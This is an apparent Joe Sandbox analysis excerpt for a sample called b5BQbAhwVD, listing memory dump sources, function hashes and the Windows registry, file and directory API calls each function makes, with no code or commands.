                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                                  • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                                  • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                                  • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                                  • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                                  APIs
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 00406307
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseQueryValue
                                                                                                                  • String ID: Call
                                                                                                                  • API String ID: 3356406503-1824292864
                                                                                                                  • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                                  • Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
                                                                                                                  • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                                  • Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                                  • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                                  • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                                  • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                                  • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                                  • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                                  • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                                  • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                                  • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                                  • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                                  • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                                  • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                                  • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                                  • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                                  • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                                  • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                                  • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                                  • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                                  • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                                  • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                                  • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                                  • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                                  APIs
                                                                                                                  • GetTickCount.KERNEL32 ref: 004032F2
                                                                                                                    • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
                                                                                                                  • SetFilePointer.KERNELBASE(0017AA5F,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FilePointer$CountTick
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1092082344-0
                                                                                                                  • Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                                  • Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
                                                                                                                  • Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                                  • Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D
                                                                                                                  APIs
                                                                                                                  • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                                                                  • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
                                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nss456A.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Enum$CloseValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 397863658-0
                                                                                                                  • Opcode ID: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                                  • Instruction ID: 69a0bd767b5398a5b54c194fc83da7942780fa4e63ecbf8b5358c30743fc2944
                                                                                                                  • Opcode Fuzzy Hash: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                                  • Instruction Fuzzy Hash: 4B017171904204ABEB149F95DE88ABF7AB8EF80348F10403EF505B61D0DAB85E419B69
                                                                                                                  APIs
                                                                                                                  • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FilePointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 973152223-0
                                                                                                                  • Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                                  • Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
                                                                                                                  • Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                                  • Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,76232EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405D76
                                                                                                                    • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                    • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                    • Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1892508949-0
                                                                                                                  • Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                                  • Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
                                                                                                                  • Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                                  • Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D
                                                                                                                  APIs
                                                                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nss456A.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseQueryValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3356406503-0
                                                                                                                  • Opcode ID: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                                  • Instruction ID: 8b4d26b48c61f4aea5aea8b01f6eaa690eaa4425e6198d6413393360261ed691
                                                                                                                  • Opcode Fuzzy Hash: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                                  • Instruction Fuzzy Hash: 61119431910205EBDB14DF64CA585AE7BB4EF44348F20843FE445B72D0D6B85A81EB5A
                                                                                                                  APIs
                                                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
